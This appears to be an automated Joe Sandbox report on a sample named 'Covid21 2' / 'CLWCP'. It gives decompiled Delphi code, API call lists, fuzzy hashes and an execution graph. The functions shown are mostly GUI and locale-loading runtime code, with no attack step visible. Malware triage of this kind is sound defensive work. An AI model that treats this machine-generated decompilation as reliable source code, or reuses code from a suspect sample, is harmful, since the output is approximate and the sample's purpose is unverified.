                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: AllocateFileHeapModuleNamememmovestrcmp
                                  • String ID: \\?\
                                  • API String ID: 1538048364-4282027825
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404E09(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8, short _a12) {
                                  				signed int _v8;
                                  				signed int _t54;
                                  				signed int _t55;
                                  				struct tagACCEL* _t57;
                                  				struct HACCEL__* _t64;
                                  				int _t69;
                                  				struct tagACCEL* _t82;
                                  				void* _t84;
                                  
                                  				_v8 = 3;
                                  				_t84 = E00406690( *0x40b474, _a4);
                                  				if(_t84 != 0) {
                                  					if((_a8 & 0x00010000) != 0) {
                                  						_v8 = 7;
                                  					}
                                  					if((_a8 & 0x00020000) != 0) {
                                  						_v8 = _v8 | 0x00000008;
                                  					}
                                  					if((_a8 & 0x00040000) != 0) {
                                  						_v8 = _v8 | 0x00000010;
                                  					}
                                  					_t69 =  *(_t84 + 0x10);
                                  					_a8 = _a8 & 0x0000ffff;
                                  					_t54 = 0;
                                  					if(_t69 <= 0) {
                                  						L12:
                                  						_t55 = _t69 + 1;
                                  						 *(_t84 + 0x10) = _t55;
                                  						if(_t55 != 1) {
                                  							_t57 = RtlReAllocateHeap( *0x40b13c, 0,  *(_t84 + 4), _t55 * 6);
                                  						} else {
                                  							_t57 = RtlAllocateHeap( *0x40b13c, 0, 6);
                                  						}
                                  						 *(_t84 + 4) = _t57;
                                  						 *((short*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 4)) = _a8;
                                  						 *((short*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 2)) = _a12;
                                  						 *((char*)( *(_t84 + 0x10) * 6 +  *(_t84 + 4) - 6)) = _v8;
                                  					} else {
                                  						_t82 =  *(_t84 + 4);
                                  						while(_a8 != (_t82->key & 0x0000ffff) || _v8 != ( *_t82 & 0x000000ff)) {
                                  							_t54 = _t54 + 1;
                                  							_t82 = _t82 + 6;
                                  							if(_t54 < _t69) {
                                  								continue;
                                  							} else {
                                  								goto L12;
                                  							}
                                  							goto L17;
                                  						}
                                  						 *((short*)( &( *(_t84 + 4)->cmd) + _t54 * 6)) = _a12;
                                  					}
                                  					L17:
                                  					_t64 =  *(_t84 + 8);
                                  					if(_t64 != 0) {
                                  						DestroyAcceleratorTable(_t64);
                                  					}
                                  					 *(_t84 + 8) = CreateAcceleratorTableA( *(_t84 + 4),  *(_t84 + 0x10));
                                  				}
                                  				return  *(_t84 + 8);
                                  			}












                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,00000006), ref: 00404E99
                                  • DestroyAcceleratorTable.USER32(?), ref: 00404F07
                                  • CreateAcceleratorTableA.USER32(?,?,00000000,?,?,?,004015C2,00000000,0000000D,00000004,00000003,0000003D,0000004B,0000004E,00000014,0040A28D), ref: 00404F13
                                  Similarity
                                  • API ID: AcceleratorTable$AllocateCreateDestroyHeap
                                  • String ID:
                                  • API String ID: 1846328917-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405C1A(struct HWND__* _a4, intOrPtr* _a8) {
                                  				struct HWND__* _t12;
                                  				struct HWND__* _t14;
                                  				intOrPtr* _t18;
                                  
                                  				_t14 = _a4;
                                  				_t16 = 1;
                                  				if(IsWindowEnabled(_t14) != 0 && IsWindowVisible(_t14) != 0 && (GetWindowLongA(_t14, 0xfffffff0) & 0x00010000) != 0) {
                                  					_t18 = _a8;
                                  					if( *_t18 == _t14) {
                                  						_t12 =  *(_t18 + 4);
                                  						if(_t12 != 0) {
                                  							SetFocus(_t12);
                                  							 *((intOrPtr*)(_t18 + 0xc)) = 1;
                                  							_t16 = 0;
                                  						}
                                  					}
                                  					 *(_t18 + 4) = _t14;
                                  				}
                                  				return _t16;
                                  			}







                                  APIs
                                  • IsWindowEnabled.USER32(?), ref: 00405C24
                                  • IsWindowVisible.USER32(?), ref: 00405C2F
                                  • GetWindowLongA.USER32(?,000000F0), ref: 00405C3C
                                  • SetFocus.USER32(?), ref: 00405C5A
                                  Similarity
                                  • API ID: Window$EnabledFocusLongVisible
                                  • String ID:
                                  • API String ID: 599048109-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004051A3(struct HWND__* _a4, struct tagPOINT _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
                                  
                                  				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0) {
                                  					MapWindowPoints(0, GetParent(_a4),  &_a8, 2);
                                  				}
                                  				return MoveWindow(_a4, _a8.x, _a12, _a16 - _a8, _a20 - _a12, 1);
                                  			}




                                  APIs
                                  • GetWindowLongA.USER32(?,000000F0), ref: 004051AB
                                  • GetParent.USER32(?), ref: 004051C1
                                  • MapWindowPoints.USER32(00000000,00000000), ref: 004051CA
                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004051E9
                                  Similarity
                                  • API ID: Window$LongMoveParentPoints
                                  • String ID:
                                  • API String ID: 473562985-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004041CF(intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
                                  				void* _t21;
                                  				struct HWND__** _t24;
                                  				signed int _t25;
                                  				struct HWND__* _t28;
                                  
                                  				_t24 = E0040642D( *0x40b470);
                                  				if( *0x40b2b4 == 0) {
                                  					memset(0x40b220, 0, 0x94);
                                  					 *0x40b220 = 3;
                                  					 *0x40b224 = 0x94;
                                  					 *0x40b228 = E0040416A;
                                  					 *0x40b298 = E00404680;
                                  					 *0x40b29c = E004046DA;
                                  					 *0x40b22c = E00404700;
                                  					 *0x40b2b4 = 1;
                                  				}
                                  				if(_a24 == 0) {
                                  					_a24 = 0x409000;
                                  				}
                                  				_t25 = _a28;
                                  				_t26 = _t25 | 0x50020000;
                                  				_t28 = CreateWindowExA(_t25 >> 0x00000008 & 0x00000200, "Static", _a24, _t25 | 0x50020000, _a8, _a12, _a16, _a20,  *_t24, 0xffffffff,  *0x40b140, 0);
                                  				if(_t28 != 0) {
                                  					_t21 = E0040662C( *0x40b46c, _a4);
                                  					 *(_t21 + 0x14) =  *(_t21 + 0x14) | 0xffffffff;
                                  					 *(_t21 + 0x10) =  *(_t21 + 0x10) | 0xffffffff;
                                  					_t28 = E004047BB(_t26, _a4, _t21, _t28, 0x40b220);
                                  				}
                                  				return _t28;
                                  			}








                                  APIs
                                  • memset.MSVCRT ref: 004041F9
                                  • CreateWindowExA.USER32(?,Static,00000000,?,00000000,?,?,00000000,00000000,000000FF,00000000), ref: 00404285
                                  Strings
                                  Similarity
                                  • API ID: CreateWindowmemset
                                  • String ID: Static
                                  • API String ID: 1730425660-2272013587
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E004044F0(void* __ecx, intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
                                  				struct HWND__** _v8;
                                  				struct HWND__** _t13;
                                  				struct HWND__* _t32;
                                  				intOrPtr _t37;
                                  
                                  				_t27 = __ecx;
                                  				_push(__ecx);
                                  				_t13 = E0040642D( *0x40b470);
                                  				_t37 =  *0x40b3ec; // 0x0
                                  				_v8 = _t13;
                                  				if(_t37 == 0) {
                                  					memset(0x40b358, 0, 0x94);
                                  					 *0x40b358 = 1;
                                  					 *0x40b35c = 0x94;
                                  					 *0x40b368 = E004044D5;
                                  					 *0x40b36c = E004044B3;
                                  					 *0x40b3ec = 1;
                                  				}
                                  				if(_a24 == 0) {
                                  					_a24 = 0x409000;
                                  				}
                                  				_t32 = CreateWindowExA(0, "Button", _a24, _a28 | 0x50030000, _a8, _a12, _a16, _a20,  *_v8, 0xffffffff,  *0x40b140, 0);
                                  				if(_t32 != 0) {
                                  					_t32 = E004047BB(_t27, _a4, E0040662C( *0x40b46c, _a4), _t32, 0x40b358);
                                  				}
                                  				return _t32;
                                  			}








                                  APIs
                                  • memset.MSVCRT ref: 0040451C
                                  • CreateWindowExA.USER32(00000000,Button,?,?,00000000,?,?,00000000,00000000,000000FF,00000000), ref: 00404583
                                  Strings
                                  Similarity
                                  • API ID: CreateWindowmemset
                                  • String ID: Button
                                  • API String ID: 1730425660-1034594571
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetPropA.USER32(?,PB_ID), ref: 0040563D
                                  • GetWindowLongA.USER32(?,000000F4), ref: 0040564A
                                  Strings
                                  Similarity
                                  • API ID: LongPropWindow
                                  • String ID: PB_ID
                                  • API String ID: 2492497586-4173770792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00404836(struct HWND__* _a4) {
                                  				struct HWND__* _t5;
                                  				struct HWND__* _t7;
                                  
                                  				_t5 = _a4;
                                  				_push(_t5);
                                  				while(1) {
                                  					_t7 = GetParent();
                                  					if(_t7 == 0) {
                                  						break;
                                  					}
                                  					if(GetPropA(_t5, "PB_WindowID") == 0) {
                                  						_t5 = _t7;
                                  						_push(_t7);
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				return _t5;
                                  			}






                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: ParentProp
                                  • String ID: PB_WindowID
                                  • API String ID: 919147419-1508741625
                                  • Opcode ID: e61d771c9100336b98a7d339edf77a3775cb866c4dae224fea0e610acfc27428
                                  • Instruction ID: b6360fad670133492f75da32d3061413dfb7044b1b8f5c3656c8761a87bd68ca
                                  • Opcode Fuzzy Hash: e61d771c9100336b98a7d339edf77a3775cb866c4dae224fea0e610acfc27428
                                  • Instruction Fuzzy Hash: 25D0C2B770136167C221662A5C84E47A6ACAAD4760300C437F701F3351C278CC0082A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:5.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:13.4%
                                  Total number of Nodes:1209
                                  Total number of Limit Nodes:65

                                  Graph

LoadCursorA 34282->34283 34285 45389f GetKeyboardLayout 34282->34285 34291 453cd4 34283->34291 34285->34234 34287 41d46e 34286->34287 34294 41c99c 34287->34294 34289 41d490 34289->34238 34290->34280 34292 4026e4 41 API calls 34291->34292 34293 453ce7 34292->34293 34293->34282 34295 41c9b7 34294->34295 34302 41c984 RtlEnterCriticalSection 34295->34302 34297 41c9c1 34298 4026e4 41 API calls 34297->34298 34300 41ca1e 34297->34300 34298->34300 34303 41c990 RtlLeaveCriticalSection 34300->34303 34301 41ca6f 34301->34289 34302->34297 34303->34301 34305 424778 34304->34305 34305->34251 34307 41ac7c 34306->34307 34308 41aca5 34307->34308 34309 41ac9b RegisterClassA 34307->34309 34310 41ac8a UnregisterClassA 34307->34310 34311 406ac4 CreateWindowExA 34308->34311 34309->34308 34310->34309 34312 41acd3 34311->34312 34313 41acf0 34312->34313 34341 41ab90 34312->34341 34313->34257 34316 454dbc 34313->34316 34315 41ace7 SetWindowLongA 34315->34313 34317 454f47 34316->34317 34318 454de5 34316->34318 34319 40411c 41 API calls 34317->34319 34318->34317 34320 41ab90 VirtualAlloc 34318->34320 34321 454f5c 34319->34321 34322 454dfe GetClassInfoA 34320->34322 34321->34257 34323 454e24 RegisterClassA 34322->34323 34328 454e59 34322->34328 34324 454e3d 34323->34324 34323->34328 34325 405c70 72 API calls 34324->34325 34326 454e4a 34325->34326 34348 40b830 41 API calls 34326->34348 34344 406b1c 34328->34344 34330 454eb0 34331 40411c 41 API calls 34330->34331 34332 454ebe SetWindowLongA 34331->34332 34333 454ede 34332->34333 34334 454f09 GetSystemMenu DeleteMenu DeleteMenu 34332->34334 34335 455bd0 79 API calls 34333->34335 34334->34317 34336 454f3a DeleteMenu 34334->34336 34337 454ee5 SendMessageA 34335->34337 34336->34317 34338 455bd0 79 API calls 34337->34338 34339 454efd SetClassLongA 34338->34339 34339->34334 34340->34260 34342 41aba0 VirtualAlloc 34341->34342 34343 41abce 34341->34343 34342->34343 34343->34315 34349 402b3c 34344->34349 34346 406b2f CreateWindowExA 34347 406b67 
34346->34347 34347->34330 34348->34328 34349->34346 34351 403ec8 34350->34351 34352 405c70 72 API calls 34351->34352 34353 403edd 34351->34353 34352->34351 34353->34150 34364 40b8ec 34354->34364 34356 40bef6 34357 40b8ec 72 API calls 34356->34357 34358 40bf0d 34357->34358 34359 40bfe8 GetVersionExA 34358->34359 34360 40bfff 34359->34360 34360->34155 34362 40cc15 34361->34362 34363 40cc05 GetProcAddress 34361->34363 34362->34158 34363->34362 34365 40b8f3 34364->34365 34366 405c70 72 API calls 34365->34366 34367 40b90b 34366->34367 34367->34356 34369 455e2d 34368->34369 34370 455e0d GetWindowTextA 34368->34370 34372 404170 41 API calls 34369->34372 34371 40420c 41 API calls 34370->34371 34373 455e2b 34371->34373 34372->34373 34373->34110 34375 44ddc2 34374->34375 34376 44ded6 34375->34376 34383 413ae4 34375->34383 34376->34116 34378 44de52 34379 405c70 72 API calls 34378->34379 34382 44de9b 34378->34382 34380 44de89 34379->34380 34393 40b86c 72 API calls 34380->34393 34382->34116 34384 413afa 34383->34384 34385 413b2f 34384->34385 34406 413958 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 34384->34406 34394 413a3c 34385->34394 34389 413b5a 34391 413b72 34389->34391 34408 4139e0 72 API calls 34389->34408 34391->34378 34393->34382 34396 413a66 34394->34396 34405 413aba 34394->34405 34395 40411c 41 API calls 34397 413ad1 34395->34397 34398 413a3c 150 API calls 34396->34398 34396->34405 34397->34389 34407 4139b0 72 API calls 34397->34407 34399 413a7e 34398->34399 34409 405168 34399->34409 34402 4051b8 30 API calls 34403 413aac 34402->34403 34412 4138d4 34403->34412 34405->34395 34406->34385 34407->34389 34408->34391 34421 405140 VirtualQuery 34409->34421 34413 4138e5 34412->34413 34414 4138f4 FindResourceA 34413->34414 34415 413951 34414->34415 34416 413904 34414->34416 34415->34405 34423 4163e8 34416->34423 34418 413915 34427 415ed4 34418->34427 34420 413930 34420->34405 34422 40515a 34421->34422 34422->34402 34424 4163f2 34423->34424 34432 4164e0 FindResourceA 
34424->34432 34426 416422 34426->34418 34444 416594 34427->34444 34429 415ef0 34448 418760 34429->34448 34431 415f0b 34431->34420 34433 416505 34432->34433 34434 41650c LoadResource 34432->34434 34442 416440 72 API calls 34433->34442 34435 416526 SizeofResource LockResource 34434->34435 34436 41651f 34434->34436 34441 416544 34435->34441 34443 416440 72 API calls 34436->34443 34439 41650b 34439->34434 34440 416525 34440->34435 34441->34426 34442->34439 34443->34440 34445 41659e 34444->34445 34446 4026e4 41 API calls 34445->34446 34447 4165b7 34446->34447 34447->34429 34477 418b50 34448->34477 34451 4187d8 34538 418b74 34451->34538 34452 41880d 34453 418b74 72 API calls 34452->34453 34456 41881e 34453->34456 34458 418834 34456->34458 34459 418827 34456->34459 34460 418b74 72 API calls 34458->34460 34462 418b74 72 API calls 34459->34462 34463 41884f 34460->34463 34461 4187eb 34465 418b74 72 API calls 34461->34465 34466 418800 34462->34466 34548 418700 72 API calls 34463->34548 34465->34466 34482 4131d4 34466->34482 34470 4188ab 34473 41893b 34470->34473 34501 41e9ac 34470->34501 34511 44e4c0 34470->34511 34534 41e6e8 34470->34534 34471 41897b 34471->34431 34472 413d2c 72 API calls 34472->34473 34473->34471 34473->34472 34549 417244 34477->34549 34480 418799 34480->34451 34480->34452 34483 4131e1 34482->34483 34555 4130c0 RtlEnterCriticalSection 34483->34555 34485 4132bb 34556 413178 RtlLeaveCriticalSection 34485->34556 34486 413d2c 72 API calls 34491 413218 34486->34491 34489 4132d2 34493 405ed8 34489->34493 34490 413d2c 72 API calls 34492 41327a 34490->34492 34491->34486 34491->34492 34557 412bfc 72 API calls 34491->34557 34492->34485 34492->34490 34494 405ee7 34493->34494 34495 405f0d TlsGetValue 34493->34495 34494->34470 34496 405ef2 34495->34496 34497 405f17 34495->34497 34558 405e94 LocalAlloc TlsSetValue 34496->34558 34497->34470 34499 405ef7 TlsGetValue 34500 405f06 34499->34500 34500->34470 34502 41e9c8 34501->34502 34506 41ea15 34501->34506 34503 41e9ec 
34502->34503 34510 40b8ec 72 API calls 34502->34510 34504 41e9fd 34503->34504 34559 41ea4c 48 API calls 34503->34559 34507 41ea09 34504->34507 34560 41ea78 6 API calls 34504->34560 34506->34473 34507->34506 34561 41eaa8 10 API calls 34507->34561 34510->34503 34512 44e4d3 34511->34512 34562 43749c 34512->34562 34514 44e5a1 34567 44e898 90 API calls 34514->34567 34515 44e532 34515->34514 34517 44e69e 34515->34517 34520 44e592 MulDiv 34515->34520 34522 44e704 34517->34522 34570 44daa0 80 API calls 34517->34570 34518 44e5ba 34518->34517 34568 44daa0 80 API calls 34518->34568 34566 41d864 45 API calls 34520->34566 34521 44e6f2 34571 43b514 72 API calls 34521->34571 34522->34473 34526 44e5db 34569 43b514 72 API calls 34526->34569 34528 44e5ee 34529 44e61d 34528->34529 34530 44e5fa MulDiv 34528->34530 34531 44e64c 34529->34531 34532 44e629 MulDiv 34529->34532 34530->34529 34531->34517 34533 44e658 MulDiv MulDiv 34531->34533 34532->34531 34533->34517 34535 41e9ac 89 API calls 34534->34535 34536 41e6ff 34535->34536 34537 41e718 GetTextExtentPoint32A 34536->34537 34537->34473 34539 417244 72 API calls 34538->34539 34540 418b89 34539->34540 34541 40420c 41 API calls 34540->34541 34542 418b96 34541->34542 34576 404634 34542->34576 34545 417244 72 API calls 34546 4187e3 34545->34546 34547 413484 74 API calls 34546->34547 34547->34461 34548->34466 34551 41724f 34549->34551 34550 417289 34550->34480 34553 416c3c 72 API calls 34550->34553 34551->34550 34554 417290 72 API calls 34551->34554 34553->34480 34554->34551 34555->34491 34556->34489 34557->34491 34558->34499 34559->34504 34560->34507 34561->34506 34563 4374ae 34562->34563 34572 433f94 34563->34572 34565 4374c6 34565->34515 34566->34514 34567->34518 34568->34526 34569->34528 34570->34521 34571->34522 34573 433fb0 34572->34573 34574 419f50 112 API calls 34573->34574 34575 433fc6 34574->34575 34575->34565 34577 4045e8 34576->34577 34578 4041e0 41 API calls 34577->34578 34579 404623 34577->34579 34580 4045ff 34578->34580 
34579->34545 34580->34579 34582 402704 41 API calls 34580->34582 34582->34579 34583 4388d8 72E89840 34584 438909 34583->34584 34585 43890e 34583->34585 34587 40cafc 74 API calls 34584->34587 34587->34585 34588 459058 34589 459074 34588->34589 34597 415bc8 34589->34597 34593 4590ba 34594 459181 34593->34594 34601 459364 41 API calls 34593->34601 34596 4590f5 34602 406a7c GlobalAlloc GlobalFix 34597->34602 34598 415bd6 34600 415d70 72 API calls 34598->34600 34600->34593 34601->34596 34602->34598

                                  Executed Functions

                                  Control-flow Graph

                                  C-Code - Quality: 65%
                                  			E004053D4(intOrPtr __eax) {
                                  				intOrPtr _v8;
                                  				void* _v12;
                                  				char _v15;
                                  				char _v17;
                                  				char _v18;
                                  				char _v22;
                                  				int _v28;
                                  				char _v289;
                                  				long _t44;
                                  				long _t61;
                                  				long _t63;
                                  				CHAR* _t70;
                                  				CHAR* _t72;
                                  				struct HINSTANCE__* _t78;
                                  				struct HINSTANCE__* _t84;
                                  				char* _t94;
                                  				void* _t95;
                                  				intOrPtr _t99;
                                  				struct HINSTANCE__* _t107;
                                  				void* _t110;
                                  				void* _t112;
                                  				intOrPtr _t113;
                                  
                                  				_t110 = _t112;
                                  				_t113 = _t112 + 0xfffffee0;
                                  				_v8 = __eax;
                                  				GetModuleFileNameA(0,  &_v289, 0x105);
                                  				_v22 = 0;
                                  				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                  				if(_t44 == 0) {
                                  					L3:
                                  					_push(_t110);
                                  					_push(0x4054d9);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t113;
                                  					_v28 = 5;
                                  					E00405210( &_v289, 0x105);
                                  					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405640, 0, 0,  &_v22,  &_v28) != 0) {
                                  						_v22 = 0;
                                  					}
                                  					_v18 = 0;
                                  					_pop(_t99);
                                  					 *[fs:eax] = _t99;
                                  					_push(E004054E0);
                                  					return RegCloseKey(_v12);
                                  				} else {
                                  					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                  					if(_t61 == 0) {
                                  						goto L3;
                                  					} else {
                                  						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                  						if(_t63 != 0) {
                                  							_push(0x105);
                                  							_push(_v8);
                                  							_push( &_v289);
                                  							L004012A4();
                                  							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                  							_t107 = 0;
                                  							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                  								_t70 =  &_v289;
                                  								_push(_t70);
                                  								L004012AC();
                                  								_t94 = _t70 +  &_v289;
                                  								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                  									_t94 = _t94 - 1;
                                  								}
                                  								_t72 =  &_v289;
                                  								if(_t94 != _t72) {
                                  									_t95 = _t94 + 1;
                                  									if(_v22 != 0) {
                                  										_push(0x105 - _t95 - _t72);
                                  										_push( &_v22);
                                  										_push(_t95);
                                  										L004012A4();
                                  										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                  									}
                                  									if(_t107 == 0 && _v17 != 0) {
                                  										_push(0x105 - _t95 -  &_v289);
                                  										_push( &_v17);
                                  										_push(_t95);
                                  										L004012A4();
                                  										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                  										_t107 = _t78;
                                  										if(_t107 == 0) {
                                  											_v15 = 0;
                                  											_push(0x105 - _t95 -  &_v289);
                                  											_push( &_v17);
                                  											_push(_t95);
                                  											L004012A4();
                                  											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                  											_t107 = _t84;
                                  										}
                                  									}
                                  								}
                                  							}
                                  							return _t107;
                                  						} else {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  			}


























                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00000000), ref: 004053F0
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 0040540E
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 0040542C
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0040544A
                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004054D9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405493
                                  • RegQueryValueExA.ADVAPI32(?,00405640,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004054D9,?,80000001), ref: 004054B1
                                  • RegCloseKey.ADVAPI32(?,004054E0,00000000,?,?,00000000,004054D9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004054D3
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004054F0
                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004054FD
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405503
                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040552E
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405575
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405585
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004055AD
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004055BD
                                  • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004055E3
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 004055F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1759228003-2375825460
                                  • Opcode ID: ff9a8cdb042367f31b6c6ce243410d3c0e109033cb35c317e927d531fa39734c
                                  • Instruction ID: 3c0e3e78233f0a82dd65aa9a4c52d1a41be1d032bd59ece1fa712f95d871d3c8
                                  • Opcode Fuzzy Hash: ff9a8cdb042367f31b6c6ce243410d3c0e109033cb35c317e927d531fa39734c
                                  • Instruction Fuzzy Hash: 82515175A0065C7AEB21D6A4CC46FEF77ACDB04744F4000BBBA04F61C1E6BC9A448FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 60%
                                  			E0046CF80(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				void* _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				void* _t63;
                                  				void* _t103;
                                  				void* _t153;
                                  				void* _t154;
                                  				char* _t155;
                                  				intOrPtr _t163;
                                  				int _t186;
                                  				char* _t188;
                                  				intOrPtr _t190;
                                  				intOrPtr _t191;
                                  				void* _t193;
                                  				void* _t196;
                                  
                                  				_t190 = _t191;
                                  				_t156 = 5;
                                  				do {
                                  					_push(0);
                                  					_push(0);
                                  					_t156 = _t156 - 1;
                                  				} while (_t156 != 0);
                                  				_push(_t156);
                                  				_v8 = __edx;
                                  				_t153 = __eax;
                                  				E004045CC(_v8);
                                  				_push(_t190);
                                  				_push(0x46d23e);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t191;
                                  				_t63 = E0040850C(_v8); // executed
                                  				_t193 = _t63 + 1;
                                  				if(_t193 == 0) {
                                  					L22:
                                  					_pop(_t163);
                                  					 *[fs:eax] = _t163;
                                  					_push(0x46d245);
                                  					E00404140( &_v48, 9);
                                  					return E0040411C( &_v8);
                                  				}
                                  				E004043DC(_v8);
                                  				E00404304();
                                  				E00407D2C(_v20, _t156,  &_v16);
                                  				E00404528(_v16, 0x46d254);
                                  				if(_t193 == 0) {
                                  					E00420878( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x33c)) + 0x170)), E00458034(1));
                                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x33c)) + 0x170)) + 0xc)))) + 0x4c))();
                                  					 *((intOrPtr*)( *((intOrPtr*)(E00420860( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x340)) + 0x170))))) + 8))();
                                  					_push(E00420860( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x340)) + 0x170))));
                                  					E0046CF50( &_v24);
                                  					E004043E4( &_v24, "\\clwcp.bmp");
                                  					 *((intOrPtr*)( *_t146 + 0x50))();
                                  					E0046CF50( &_v28);
                                  					_t156 = "\\clwcp.bmp";
